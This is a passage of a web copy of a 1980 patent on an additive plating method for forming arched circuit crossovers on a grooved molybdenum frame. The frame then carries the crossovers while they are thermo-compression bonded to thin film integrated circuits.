"'</span><br/><br/>" Err.Clear ON ERROR GOTO 0 EXIT FUNCTION END IF ON ERROR GOTO 0 Set colItems = objWMIService.ExecQuery("Select * from Win32_LogicalDisk WHERE DriveType=3") htmlDriveReport = "<table><tr class=""tableHead""><td colspan=""5"">" & strComputer & _ "</td></tr><tr><th>Drive</th><th>Size</th><th>Used</th><th>Free</th><th>Free(%)</th></tr>" For Each objItem in colItems DIM pctFreeSpace,strFreeSpace,strusedSpace, cssClass pctFreeSpace = round(((objItem.FreeSpace / objItem.Size) * 100),1) strDiskSize = ConvertToDiskUnit(objItem.Size) strFreeSpace = ConvertToDiskUnit(objItem.FreeSpace) strUsedSpace = ConvertToDiskUnit(objItem.Size-objItem.FreeSpace) IF pctFreeSpace < criticalLevel THEN cssClass = "critical" ELSEIF pctFreeSpace < warningLevel THEN cssClass = "warning" ELSEIF pctFreeSpace > goodLevel THEN cssClass = "good" ELSE cssClass = "neutral" END IF dim strChart strChart = "<div style=""width=100%;""><span style=""width=" & 100-pctFreeSpace & _ "%;background-color:blue;""></span><span style=""width=" & pctFreeSpace & _ "%;background-color:#FF00FF;""></span></div>" htmlDriveReport = htmlDriveReport & "<tr><td>" & objItem.Name & strChart & "</td><td>" & _ strDiskSize & "</td><td>" & strUsedSpace & "</td><td>" & _ strFreeSpace & "</td><td class=""" & cssClass & """>" & pctFreeSpace & "%</td></tr>" Next htmlDriveReport = htmlDriveReport + "</table></br>" GetDriveReportHTML = htmlDriveReport end function sub GetDriveReportsCSV dim csv, strComputer,strComputers, path strComputers = txtComputers.value csv = "Computer,Drive,Size,Used,Free,Free(%)" for each strComputer in SPLIT(strComputers,chr(13)) strComputer = TRIM(REPLACE(strComputer,chr(10),"")) if strComputer <> "" then if csv <> "" then csv = csv & VbCrLf end if csv = csv & GetDriveReportCSV(strComputer) end if next path = INPUTBOX("Enter FileName:","Enter FileName","MyDriveReport.csv") if path = "" then exit sub end if WriteTextFile csv, path end sub function GetDriveReportCSV(byval strComputer) Dim objWMIService, objItem, colItems Dim strDriveType, strDiskSize, csvDriveReport ON ERROR RESUME NEXT Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") IF Err.Number <> 0 THEN GetDriveReportCSV = strComputer & ",Error,Error,Error,Error,Error" Err.Clear ON ERROR GOTO 0 EXIT FUNCTION END IF ON ERROR GOTO 0 Set colItems = objWMIService.ExecQuery("Select * from Win32_LogicalDisk WHERE DriveType=3") For Each objItem in colItems DIM pctFreeSpace,strFreeSpace,strusedSpace, cssClass pctFreeSpace = round(((objItem.FreeSpace / objItem.Size) * 100),1) strDiskSize = ConvertToDiskUnit(objItem.Size) strFreeSpace = ConvertToDiskUnit(objItem.FreeSpace) strUsedSpace = ConvertToDiskUnit(objItem.Size-objItem.FreeSpace) IF pctFreeSpace < criticalLevel THEN cssClass = "critical" ELSEIF pctFreeSpace < warningLevel THEN cssClass = "warning" ELSEIF pctFreeSpace > goodLevel THEN cssClass = "good" ELSE cssClass = "neutral" END IF if csvDriveReport <> "" then csvDriveReport = csvDriveReport & VbCrLf end if csvDriveReport = csvDriveReport & strComputer & "," & objItem.Name & "," & _ strDiskSize & "," & strUsedSpace & "," & _ strFreeSpace & "," & pctFreeSpace & "%" Next GetDriveReportCSV = csvDriveReport end function sub WriteTextFile(byval txt,byval path) DIM objFSO, objTextFile set objFSO = createobject("Scripting.FileSystemObject") IF objFSO.FileExists(path) THEN IF msgbox("Warning: file already exists! Overwrite file?",vbYesNo+vbQuestion,"Overwrite File?") = vbNo THEN exit sub END IF END IF set objTextFile = objFSO.CreateTextFile(path) objTextFile.Write(txt) objTextFile.Close msgbox "Created '" & path & "' Report",vbOKOnly+vbInformation end sub </script> <body> <h1 style="margin-bottom: 0px;"> Drive Space Report</h1> <div style="text-align: right; font: bold 8pt arial,sans-serif; color: #787878;"> By David Wiseman, <a target="_blank" href="http://www.wisesoft.co.uk">www.wisesoft.co.uk</a> </div><br /> <div style="text-align: center;"> Enter names of computers (one line per computer):<br /> <textarea name="txtComputers" rows="4" cols="50"> localhost . 127.0.0.1 </textarea><br /> <input style="font-weight:bold;" onclick="GetDriveReportsHTML" type="submit" value="Generate Report"></input> <input onclick="GetDriveReportsCSV" type="submit" value="Download Report (CSV)"></input> <br /> <br /> </div> <div style="text-align: center;" id="report"> </div> </body> </html>   Got a useful script? Click here to upload!     Post Comment Order By:   User Comments        David Wiseman (Administrator) United Kingdom Posted On: 8/7/2008 3:15:02 PM Just added a chart (progress bar) to show the used disk space.
__label__pos
0.663169
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free. I am trying to prove the following algorithm to see if a there exists a path from u to v in a graph G = (V,E). I know that to finish up the proof, I need to prove termination, the invariants, and correctness but I have no idea how. I think I need to use induction on the while loop but I am not exactly sure how. How do I prove those three characteristics about an algorithm? share|improve this question 1   what "following algorithm"? –  phil_20686 May 12 '14 at 12:54 2 Answers 2 up vote 1 down vote accepted Disclaimer: I don't know how much formal you want your proof to be and I'm not familiar with formal proofs. 1. induction on the while loop: Is it true at the beginning? Does it remain true after a step (quite simple path property)? 2. same idea, induction on k (why k+1???): Is it true at the beginning? Does it remain true after a step (quite simple path property)? 3. Think Reach as a strictly increasing set. Termination: maybe you can use a quite simple property linked to the diameter of the graph? (This question could probably be better answered elsewhere, on http://cstheory.stackexchange.com/ maybe?) share|improve this answer There is a lot of possibilities. For example, for a Breadth First Search, we note that: (1) The algorithm never visits the same node twice.(as any path back must be >= the length that put it in the discovered pile already. (2) At every step, it adds exactly one node. Thus, it clearly must terminate on any finite graph, as the set of nodes which are discoverable cannot be larger than the set of nodes which are in the graph. Finally, since, give a start node, it will only terminate when it has reached every node which is connected by any path to the start node, it will always find a path between the start and target if it exists. You can rewrite these logical steps above in deeper rigour if you like, for example, by showing that the list of visited nodes is strictly increasing, and non convergent (i.e. adding one to something repeatedly tends to infinity) and the termination condition must be met at at most some finite value, and a non convergent increasing function always intersects a given bound exactly once. BFS is an easy example because it has such simple logic, but proving these things for a given algorithm may be extremely tricky. share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.99253
Material Design for Angular vs. Foundation vs. Flat UI Get help choosing one of these Get news updates about these tools Favorites 66 Favorites 86 Favorites 32 Hacker News, Reddit, Stack Overflow Stats • - • 21 • 0 • - • 1.19K • 702 • 3 • 6 • 13 GitHub Stats Description What is Material Design for Angular? Material Design is a specification for a unified system of visual, motion, and interaction design that adapts across different devices. Our goal is to deliver a lean, lightweight set of AngularJS-native UI elements that implement the material design system for use in Angular SPAs. What is Foundation? Foundation is the most advanced responsive front-end framework in the world. You can quickly prototype and build sites or apps that work on any kind of device with Foundation, which includes layout constructs (like a fully responsive grid), elements and best practices. What is Flat UI? Flat UI is a beautiful theme for Bootstrap. We have redesigned many of its components to look flat in every pixel. Pros Why do developers choose Material Design for Angular? • Why do you like Material Design for Angular? Why do developers choose Foundation? • Why do you like Foundation? Why do developers choose Flat UI? Why do you like Flat UI? Cons What are the cons of using Material Design for Angular? No Cons submitted yet for Material Design for Angular Downsides of Material Design for Angular? What are the cons of using Foundation? No Cons submitted yet for Foundation Downsides of Foundation? What are the cons of using Flat UI? No Cons submitted yet for Flat UI Downsides of Flat UI? Companies What companies use Material Design for Angular? 212 companies on StackShare use Material Design for Angular What companies use Foundation? 658 companies on StackShare use Foundation What companies use Flat UI? 4 companies on StackShare use Flat UI Integrations What tools integrate with Material Design for Angular? 1 tools on StackShare integrate with Material Design for Angular What tools integrate with Foundation? 4 tools on StackShare integrate with Foundation What tools integrate with Flat UI? 1 tools on StackShare integrate with Flat UI What are some alternatives to Material Design for Angular, Foundation, and Flat UI? • Bootstrap - Simple and flexible HTML, CSS, and JS for popular UI components and interactions • Semantic UI - A UI Component library implemented using a set of specifications designed around natural language • Materialize - A modern responsive front-end framework based on Material Design • Material UI - A CSS Framework and a Set of React Components that Implement Google's Material Design See all alternatives to Material Design for Angular Latest News How Design Insights Transformed Foundation Building ... Foundation Building Blocks: Over 100 Components to J... Foundation & CSS Grid: Think Beyond the Page Interest Over Time Get help choosing one of these
__label__pos
0.972278
Fibromyalgia May Increase the Risk of Premature Death Fibromyalgia May Increase the Risk of Premature Death • Health • August 15, 2023 • No Comment • 80 In recent years, the impact of fibromyalgia on overall health has gained significant attention. Fibromyalgia, a chronic pain disorder characterized by widespread musculoskeletal pain, fatigue, and sleep disturbances, has long been associated with reduced quality of life. However, emerging research suggests a more alarming concern: the potential link between fibromyalgia and an increased risk of premature death. Understanding Fibromyalgia What is Fibromyalgia? Fibromyalgia is a complex and debilitating condition that affects millions of people worldwide. It is characterized by widespread pain, tenderness, and heightened sensitivity to touch. While its exact cause remains elusive, factors such as genetics, infections, and physical or emotional trauma are believed to contribute to its development. Impact on Daily Life Individuals with fibromyalgia often face a range of symptoms beyond pain. Fatigue, sleep disturbances, cognitive difficulties (often referred to as “fibro fog”), and mood disorders can significantly impact their daily lives, making even simple tasks challenging. The Startling Connection: Fibromyalgia and Premature Death Research Findings Recent studies have raised concerns about the potential link between fibromyalgia and premature death. While research is ongoing, some studies suggest that individuals with fibromyalgia might face a higher mortality rate compared to the general population. These findings have ignited discussions among healthcare professionals and researchers alike. Possible Explanations The reasons behind the potential link are multifaceted. Chronic inflammation, a common feature of fibromyalgia, has been associated with various health complications, including cardiovascular diseases and neurodegenerative disorders. Moreover, the impact of fibromyalgia on mental health can lead to depression and anxiety, further contributing to health challenges. Navigating the Challenges Holistic Approach to Management Managing fibromyalgia goes beyond addressing physical pain. A holistic approach that combines medical treatments, lifestyle modifications, and mental health support is crucial. Physical therapy, low-impact exercises, and stress-reduction techniques can help alleviate symptoms and improve overall well-being. Importance of Early Diagnosis Early diagnosis plays a pivotal role in managing fibromyalgia effectively. Recognizing the symptoms and seeking medical attention promptly can lead to early interventions that may prevent the progression of the condition and its potential complications. Conclusion In conclusion, the relationship between fibromyalgia and the risk of premature death is a complex and evolving area of study. While research indicates a possible connection, more investigations are needed to establish a definitive link. Individuals living with fibromyalgia should focus on comprehensive management strategies, including medical care, lifestyle adjustments, and mental health support, to enhance their quality of life and potentially mitigate associated risks. Related post Best Home Remedies for Back Pain: Advice From a Physical Therapist Best Home Remedies for Back Pain: Advice From a… Back pain is a common issue that can affect your daily life and well-being. Seeking relief from the discomfort doesn’t always… 6 Hand Exercises for Multiple Sclerosis 6 Hand Exercises for Multiple Sclerosis Maintaining hand mobility and strength is crucial for individuals with multiple sclerosis (MS). Hand exercises can play a significant role in… The Best Body-Weight Exercises for Working Out Every Part of Your Body The Best Body-Weight Exercises for Working Out Every Part… If you’re looking for an efficient and accessible way to work out your entire body, body-weight exercises are the perfect solution.… Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.841453
Thursday, 21 September 2017 Kernel tuning in Kubernetes Kubernetes is a great piece of technology, it trivialises things that 5 years ago required solid ops knowledge and makes DevOps attainable for the masses. More and more people start jumping on the Kubernetes bandwagon nowadays, however sooner or later people realise that a pod is not exactly a small VM magically managed by Kubernetes. Kernel tuning So you've deployed your app in Kubernetes, everything works great, you just need to scale now. What do you do to scale? The naive answer is: add more pods. Sure, you can do that, but pods will quickly hit kernel limits. One particular kernel parameter I have in mind is net.core.somaxconn. This parameter represents the maximum number of connections that can be queued for acceptance. The default value on Linux is 128, which is rather low: root@x:/# sysctl -a | grep "net.core.somaxconn" net.core.somaxconn = 128 You might get away with not increasing it, but I believe it's wasteful to create new pods unless there is a cpu or memory need. In order to update a sysctl parameter, in a normal Linux VM, the following command will just work: root@x:/# sysctl -w net.core.somaxconn=10000     However, try it in a pod and you get this: root@x:/# sysctl -w net.core.somaxconn=10000   sysctl: setting key "net.core.somaxconn": Read-only file system Now you start realising that this is not your standard Linux VM where you can do whatever you want, this is Kubernetes' turf and you have to play by its rules. Docker image baking At this point you're probably wondering why am I not just baking the sysctl parameters into the docker image. The docker image could be as simple as this: FROM alpine #Increase the number of connections RUN echo "net.core.somaxconn=10000" >> /etc/sysctl.conf Well, the bad news is that it doesn't work. As soon as you deploy the app and connect to the pod, the kernel parameter is still 128. Variations on the docker image baking theme can be attempted, however I could not successfully do it and I have a strong feeling that it's not doable this way. Kubernetes sysctl There is documentation around sysctl in Kubernetes here. So Kubernetes acknowledges the fact that kernel tuning is required sometimes and provides explicit support for that. Then it should be as easy as following the documentation, right? Not quite, the documentation is a bit vague and it didn't quite work for me. I'm not creating pods directly as described in the documentation, I am using deployments. After a bit of research, I did find a way to do it, via init containers. Init containers are specialised Containers that run before app Containers and can contain utilities or setup scripts not present in an app image. Let's see an example: In order for this to work you will need to create a custom ubuntu image that never terminates. It's a bit of a hack, I know, but the point is to keep the pod running so that we can connect and inspect that the sysctl changes were successfully applied. This is the Dockerfile: In order to test this we have to build the image first: docker build -t ubuntu-test-image . I am using minikube locally, for testing, so I'm creating the deployment like this: kubectl apply -f ubuntu-deployment.yml In a Kubernetes cluster, the config has to be provided with the command. Once the deployment was created let's log into the pod and inspect the changes. First we need to find the pod id: bogdan@x:/$ kubectl get pods | grep ubuntu-test ubuntu-test-1420464772-v0vr1     1/1       Running            0          11m Once we have the pod id, we can log into the pod like this:  kubectl exec -it ubuntu-test-1420464772-v0vr1   -- /bin/bash Then check the sysctl parameters: :/#  sysctl -a | grep "net.core.somaxconn"  net.core.somaxconn = 10000  :/# sysctl -a | grep "net.ipv4.ip_local_port_range"  net.ipv4.ip_local_port_range = 1024     65535  As you can see the changes were applied.  4 comments: 1. Awesome post. thanks for sharing ReplyDelete 2. Being new to the blogging world I feel like there is still so much to learn. Your tips helped to clarify a few things for me. Thanks for this great share. Kubernetes Architecture ReplyDelete 3. great ! thank you helping me. ReplyDelete
__label__pos
0.575812
last updated 09-02-2023 Gastro-oesophageal reflux Reflux disease This figure shows the common causes of gastro-oesophageal reflux disease. These include a lack of saliva, poor peristaltic movement through the oesophagus, decreased lower oesophageal sphincter (LES) pressure, transient episodes of LES relaxation, delayed gastric emptying, and increased gastric acid. Therapy is aimed at decreasing gastrointestinal gastric acid, increasing gastric motility, or increasing LES tone. 1 Acid-reducing therapy should aim at high pH levels in order to inactivate pepsin. This is usually obtained at pH levels above:
__label__pos
0.622853
    Resources Contact Us Home Browse by: INVENTOR PATENT HOLDER PATENT NUMBER DATE     Additive method of forming circuit crossovers 4200975 Additive method of forming circuit crossovers Patent Drawings:Drawing: 4200975-2    Drawing: 4200975-3     « 1 » (2 images) Inventor: Debiec, et al. Date Issued: May 6, 1980 Application: 05/910,989 Filed: May 30, 1978 Inventors: Debiec; Richard P. (LaGrange Park, IL) Wydra; William T. (Darien, IL) Assignee: Western Electric Company, Incorporated (New York, NY) Primary Examiner: Husar; Francis S. Assistant Examiner: Arbes; C. J. Attorney Or Agent: Bergum; K. R. U.S. Class: 257/763; 257/776; 257/E23.17; 29/827; 29/842; 29/847; 427/125; 427/97.4 Field Of Search: 29/625; 29/628; 29/629; 357/68; 357/65; 164/97; 164/98; 164/75; 164/14; 427/272; 427/282; 427/286; 427/287; 427/96; 427/125 International Class: U.S Patent Documents: B231416; 2629907; 3461524; 3562040; 3597839; 3667988; 3729816; 4000054; 4054484 Foreign Patent Documents: Other References: Western Electric Engineer, vol. XX, No. 2, pp. 3-6, Apr. 1976.. Abstract: Through the use of a uniquely constructed molybdenum frame, a completely additive fabrication method may advantageously be employed to form an array of minute interconnecting circuit crossovers directly on the frame, using photolithographic and plating processes, with the requisite arches of the crossovers being directly formed within specially configured grooves of the frame during the plating operation. The frame is thereafter initially used as a temporary crossover carrier member, and subsequently as a bonding member during the thermo-compression bonding of the individual crossovers to respectively associated bond sites of the circuit, which typically may be of the integrated thin or thick film type. Such a simplified additive crossover generating technique advantageously obviates the need of not only potentially circuit-damaging chemical etching operations, but the many associated processing and handling steps associated therewith. Claim: We claim: 1. A method of forming a circuit crossover, with an arched intermediate region, for subsequent use in crossing over an intervening circuit element of a substrate-supported circuit,comprising the steps of: forming a mask-defined, exposed area on one planar surface of a frame member such that said exposed area extends across and a predetermined distance beyond opposite sides of a groove, previously formed with a concave base, in the one surface ofthe frame member; plating said exposed surface area of said frame member to form a metallic crossover, of predetermined thickness, with two planar end regions interconnected by an intermediate arched region, the latter being formed within the concave base of saidgroove, said completely formed crossover thereafter remaining on the frame member until subsequently transferred to an associated circuit. 2. A method in accordance with claim 1 further comprising the step of removing said mask prior to the time when said formed crossover is transferred to an associated circuit. 3. A method in accordance with claim 1 wherein a predetermined mask-defined, patterned array of exposed areas are formed on said one planar surface of the frame member such that each exposed area extends across and a predetermined distancebeyond opposite sides of a different one of a plurality of spaced, parallel extending grooves, previously formed with concave bases, in the one surface of the frame member, and wherein a metallic crossover is plated on each exposed surface area of saidframe member so as to simultaneously form an array thereof for subsequent transfer to an associated circuit. 4. A method in accordance with claim 3 further comprising the step of removing said mask-defined pattern from said frame member prior to the time when said arrray of formed crossovers are transferred to an associated circuit. 5. A method in accordance with claim 2 further comprising the steps of: aligning the terminating end regions of said plated crossover formed on the frame member with spaced and respectively associated circuit elements forming bond sites of a substrate-supported circuit; bonding the terminating end regions of the crossover to the respectively aligned bond sites of the circuit such that the bond strength between the crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between the crossover and the frame member, and removing the frame member from the circuit bonded crossover, for reuse. 6. A method in accordance with claim 4 further comprising the steps of: aligning the terminating end regions of each of the array of plated crossovers formed on said frame member with spaced and respectively associated bond sites of the circuit; bonding the terminating end regions of each crossover to the respectively aligned bond sites of the circuit such that the bond strength between each crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between each crossover and the frame member, and removing the frame member from the array of circuit-bonded crossovers, for reuse. 7. A method in accordance with claim 6 wherein said mask-defined pattern is formed by a photolithographic process, and wherein said plating step comprises a series of plating operations that form a composite multi-layered crossover, each layerbeing comprised of a different metallic material, with the outer layer being gold. 8. A method in accordance with claim 7 wherein said frame member is made of a thin sheet of molybdenum, and said circuit comprises a thin film circuit fabricated on a high alumina ceramic substrate. 9. A method of fabricating an array of circuit crossovers, with arched intermediate regions, on a substrate-supported circuit, comprising the steps of: forming a predetermined mask-defined, patterned array of exposed areas on one surface of a frame member such that each exposed area extends across and a predetermined distance beyond opposite sides of a different one of a plurality of grooves,each previously formed with a concave base, in the one surface of the frame member; plating each exposed surface area of said frame member to form a metallic crossover, of predetermined thickness, with two planar end regions interconnected by an intermediate arched region, the latter being formed within the concave base of eachgroove; removing said mask-defined pattern from said frame member; aligning the terminating end regions of each of the array of plated crossovers formed on said frame member with spaced and respectively associated bond sites of the circuit; bonding the terminating end regions of each crossover to the respectively aligned bond sites of the circuit such that the bond strength between each crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between each crossover and the frame member, and removing the frame member from the array of circuit-bonded crossovers, for reuse. 10. A method in accordance with claim 9 wherein said mask-defined pattern is formed by a photolithographic process. 11. A method in accordance with claim 10 wherein said frame member is made of a thin sheet of molybdenum, and said circuit comprises a thin film circuit fabricated on a high alumina ceramic substrate. 12. A method in accordance with claim 9 wherein said plating step comprises a series of plating operations that form composite multi-layered crossovers, each crossover layer being comprised of a different metallic material, with the outer layerbeing gold. 13. A method in accordance with claim 9 wherein said crossover plating step involves plating a first layer of nickel, an intermediate layer of copper and an outer exposed layer of gold on each mask-exposed area of said frame. 14. A method in accordance with claim 12 wherein said crossover plating step further includes the step of plating a thin layer of indium on the outer layer of gold. 15. A method in accordance with claim 9 wherein said bonding step involves the application of predetermined heat and pressure to said aligned and contacting frame and circuit so as to effect thermo-compression bonds between each of saidcrossovers and the respectively associated bond sites of said circuit. 16. A method in accordance with claim 15 wherein a compensating member is interposed between the backside of said circuit substrate and a driving member of a bonder so as to compensate for dimensional variations in said substrate and to,thereby, impart substantially uniform bonding pressure to all of said crossovers simultaneously. Description: BACKGROUND OF THE INVENTION 1. Field of the Invention This invention relates to the fabrication of integrated circuits, such as of the thin film integrated circuit type and, more particularly, to the fabrication of circuit crossovers, and the subsequent bonding thereof to respectively associatedbond sites of the circuit. 2. Description of the Prior Art With the ever increasing complexity and density of integrated circuitry processed and/or fabricated on ceramic substrates, the need for interconnecting circuit "crossovers", of three-dimensional configuration, have often proven essential in orderto optimize the utilization of substrate surface area. As the name implies, a crossover essentially comprises a bridge-like element which allows different portions of a circuit, such as two spaced bonding pads or sites, to be interconnected, while anintermediate portion of the crossover extends out of the otherwise uniform plane of the circuit so as to bridge an intervening metallized circuit path or element. The complexity of the problem of fabricating and bonding an array of crossovers to an otherwise completely fabricated integrated circuit may be appreciated by the following typical example. In one representative hybrid integrated circuit packemployed in an electronic telephone switching system, the supporting ceramic substrate measures 31/4".times.4", with not only dozens of individual silicon integrated circuits and 92 lead connections, but over 4,000 crossovers. Each crossover typicallymeasures from 4 to 6 mils in width, 40 to 80 mils in length, and 25 to 50 microns in thickness, with an intermediate bowed region having an arch height on the order of 3 mils, and with the spacings between crossovers often being as close as 12 mils,center to center. One prior method of fabricating such crossovers is dislcosed in U.S. Pat. No. 3,461,524, of M. P. Lepselter, assigned to Bell Telephone Laboratories. In that method, generally referred to as a plated beam method, an intermediate conductivelayer, such as of copper, is initially deposited over each circuit element which is to be crossed over, or bridged, and an outer conductive layer, such as of gold, is then deposited over the intermediate layer and onto selected areas of differentportions of the circuit which are to be interconnected on opposite sides of each circuit element to be bridged. The intermidiate material is then removed so as to leave an air dielectric between each crossover and the bridged circuit element. Ifdesired, a permanent solid dielectric can be deposited between the formed crossovers and respectively bridged circuit elements. A similar technique for fabricating plated beam type crossovers is disclosed in an article entitled "Batch Bonded Crossoversfor Thin Film Circuits", published in the Western Electric Engineer, Vol. XX, No. 2, April 1976. U.S. Pat. No. 4,054,484 of N. G. Lesh et al., also assigned to Bell Telephone Laboratories, discloses a crossover fabrication technique wherein evaporated layers of titanium and copper are used as base layers to build up a beam-type crossoverspacing layer. A nickel protective layer is formed over the evaporated layers, as well as over the circuit areas initially formed on the substrate. A copper spacing layer is then plated over the nickel layer. Spaced pairs of pillar holes are thenetched in selected areas of both the copper spacing layer and the nickel protective layer to expose spaced regions of the initially formed circuit therebelow to be interconnected. This is followed by forming the desired interconnecting gold crossoverson the copper spacing layer. The copper spacing layer is finally removed by an etchant which preferentially attacks the copper. The nickel protective layer and the copper base layers are also removed, preferably with the same etchant. While the aforementioned plated beam crossover techniques are capable of producing well-defined and extremely minute crossovers, such techniques do give rise to several potentially serious manufacturing problems. First, the processing stepsrequired are both time consuming and costly. Secondly, the etchants required to remove selected material to form the plated beam type crossovers may often be incompatible with other circuit materials and/or devices forming the composite circuit, therebypossibly resulting in damage to the circuit, even when great care is taken in the fabricating, as well as handling, of the circuit. With respect to handling, it is readily apparent that the more times the circuit and/or crossovers must be manipulated incarrying out the necessary processing steps, the more susceptible is the circuit to damage. Thirdly, it will be appreciated that there is no simple, reliable way of testing whether plated beam type crossovers are adequately secured to the circuit, as itwould be extremely difficult, as well as time consuming and expensive, to test the bond strength of such crossovers on either an individual or random basis. Moreover, even if random testing were employed, it is very difficult to perform peel tests onplated-beam type crossovers without either destroying the bonds, or otherwise damaging the crossovers. As a result of the problems and costs encountered in fabricating plated-beam type crossovers, a batch bonded method was developed and is disclosed in J. A. Burns et al. U.S. Pat. No. 3,762,040, assigned to the same assignee as the presentinvention. In accordance with one preferred version of this last-mentioned method, an array of metallic crossovers are initially formed as minute bars, i.e., without arched regions, on a carrier member, such as a copper-polyimide laminated film, inaccordance with any one of a number of conventional mask-defined, metal plating techniques. The resultant array of two-dimensional plated crossovers are thereafter formed, in conjunction with a specially constructed backing member (having an array ofslos that correspond with the generated array of crossovers), by an extrusion or deformation technique either prior to or during the subsequent bonding of the crossovers to a circuit. This technique is also disclosed in the aforementioned WesternElectric Engineer article. J. A. Burns U.S. Pat. No. 3,729,816, also assigned to the same assignee as the present invention, discloses the use of a batch bonded technique for generating temporary crossovers for use in the electrical testing of portions of a thin filmcircuit during the fabrication thereof. The prior batch bonded crossover method has a number of advantages over the plated-beam crossover method. First, the number of photoresist, plating and etching steps are considerably reduced. This leads to lower fabrication costs, and oftenhigher yields. Higher yields are also more often realized with the prior batch bonded versus plated beam crossover fabrication method because the former method is carried out completely independently of the considerably more expensive thin filmcircuit-generating method. As a result, both the fabricated crossover array and the associated integrated circuit may be independently examined for defects prior to the crossovers being bonded to the circuit as the last, or one of the last, stepsinvolved in the fabrication of a complete, composite circuit. Notwithstanding the significant advantages realized by utilizing the prior batch bonded crossover method, the fact remains that it has nevertheless still proven to be a relatively costly method, primarily because of not only the necessity ofhaving to use a rather expensive copper-polyimide laminate carrier, but because of the attendant photoresist and chemical etching steps required to generate the array of crossovers, not to mention the additional steps involved to form the arched regionsthereof. In addition, when the etched window backing member, employed to form the crossover arches, is also used as a temporary frame for the copper-polyimide film, and is preferably made of molybdenum (for reasons discussed in greater detailhereinafter), the cumulative exposure thereof to the necessary copper etchant unfortunately has been found to limit its life to about fifty operating cycles. As such backing members, particularly when formed with complex arrays of precision formedetched windows, are rather expensive, it is seen that their periodic replacement costs alone may constitute an appreciable portion of the overall costs of fabricating thin film integrated circuits, with batch-bonded crossovers of the type in question, inhigh volume manufacturing operations. SUMMARY OF THE INVENTION It, therefore, is an object of the present invention to generate an array of circuit crossovers, and thereafter bond them simultaneously to respectively associated bonding sites of an integrated circuit, in a simplified, inexpensive and reliablemanner, by obviating the need during the fabrication of the crossovers of any chemical etchants, or of a costly copper-polyimide laminate, as well as of any separate crossover deformation or extrusion steps to produce the requisite arches therein eitherbefore or during the bonding thereof to the circuit. In accordance with the principles of the present invention, the above and other objects are realized by utilizing a completely additive method, and a specially constructed molybdenum frame, to fabricate, through a plating operation, an array ofcircuit crossovers, with the necessary arches, directly on the frame. Thereafter, the completely fabricated array of crossovers are transferred en masse from the frame to, and simultaneously bonded on, respectively associated circuit pads or bond sitesof an otherwise completely fabricated integrated circuit, such as of the thin or thick film type. In order to carry out such a unique crossover fabrication method, the crossover-supporting frame is initially constructed with a plurality of parallelextending grooves on at least one side thereof, with the grooves each having a concave or semi-circular base. With the normal gold-to-gold bonds established between each fabricated crossover and the associated circuit bond sites producing peel strengths considerably greater then those initially established between each plated crossover and the frame, thelatter may be advantageously cleanly peeled from the array of circuit-bonded crossovers for reuse. This peeling step advantageously also inherently provides a reliable way of testing the adequacy of the permanent bonds. Even more significant, however, are the appreciable cost savings realized in fabricating crossovers in accordance with the subject method, and specially constructed molybdenum frame. More specifically, the present invention obviates the priortime consuming and costly series of photolithographic processing steps performed either directly on the integrated circuit substrate (in forming plated beam crossovers), or indirectly on a rather expensive copper/polyimide laminate (in forming priorbatch bonded crossovers). In the latter case, of course, the actual forming of the arches also involves a number of additional steps, the exact number depending on whether the arches are formed before or during the bonding of the crossovers to thecircuit. Further indirect cost savings are realized in accordance with the present invention, as compared to the prior batch bonded methods, by the considerably increased life of the molybdenum frames (or backing members) made possible by their nothaving to be subjected to any chemical etchants. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is an enlarged, fragmentary perspective view illustrating the molybdenum frame formed with a patterned array of concave grooves on one side thereof, which grooves allow the intermediate arches of a patterned array of associated crossoversto be formed directly therein at the same time that the integral planar end portions of the crossovers are being formed during a common plating operation, through a suitable photo-resist mask (not shown), in accord with the principles of the presentinvention; FIG. 2 is an end view of the molybdenum frame, which functions not only as a temporary carrier for each successive array of crossovers previously plated on the grooved side thereof, but as a bonding member when positioned in proper alignment withan associated circuit, such as of the thin film type, previously fabricated on a ceramic-supporting substrate; FIG. 3 is an enlarged, fragmentary perspective view of the thin film integrated circuit of FIG. 2, after an array of minute circuit crossovers (only three being shown) have been simultaneously bonded to respectively aligned bond sites formingpart of the circuit; FIG. 4 is a simplified side elevational view of a suitable illustrative fixture for aligning the bond sites on a typical substrate-supported integrated circuit relative to an array of associated crossovers fabricated and temporarily supported onthe subject grooved frame, and FIG. 5 is an enlarged, detail sectional view, taken along the line 5--5 of FIG. 1, illustrating one preferred type of multi-layered crossover. DETAILED DESCRIPTION OF THE INVENTION It should be appreciated that the methods and apparatus as embodied herein, and described in detail hereinbelow, have universal application in bonding metallic, interconnecting circuit crossovers to respectively associated bond sites on diversetypes of substrate-supported electrical circuits of not only the thin or thick film type, but also of the conventional printed circuit type, utilizing discrete and/or hybrid integrated circuit devices. For purposes of illustration, however, the subjectinvention is described herein in connection with one preferred application, namely, in generating an array of minute crossovers for use in completing interconnections on a ceramic substrate-supported thin film circuit. With particular reference first to FIG. 1, a substantially planar frame member 10, hereinafter simply refered to as the frame, is formed on at least one side 11 with a plurality of spaced, parallel extending grooves 12, each having a concave, orsemi-circular base 13. The frame 10 is uniquely employed in generating an array of minute conductive circuit crossovers 16, with arched intermediate regions 16a, on the grooved side 11 thereof. Considered more specifically, the uniquely constructed frame 10 allows an array of crossovers 16 to be fabricated in accordance with a completely additive process, i.e., the crossovers are directly plated, through a patterned photoresist-appliedmask (not shown), directly on the grooved side 11 of the frame 10, with no chemical etching operations being required. With the crossover-defined windows developed in the photoresist mask being oriented such that each window extends across, i.e.,perpendicularly to an associated groove 13 in the frame, the required intermediate arched region of each crossover is inherently formed within the associated concave groove 13 during the plating-formation of the crossovers. Considered another way, thecentral arched region 16a and the integral opposite end planar (two-dimensional) end regions 16b of each crossover are advantageously simultaneously formed during the common plated buildup thereof in accordance with the principles of the presentinvention. After the plating operation, and the removal of the photoresist by any conventional means, the generated array of frame-supported crossovers are aligned with, and simultaneously batch-bonded to, respectively associated bond sites 19 of anotherwise completely fabricated circuit 21, such as of the thin film integrated circuit type supported on a substrate 22, while positioned relative to each other as schematically illustrated in FIG. 2. With the frame 10 preferably being made of molybdenum, and with the bond sites of the circuit 21 normally having at least an upper exposed layer of gold, the bond strength between each crossover 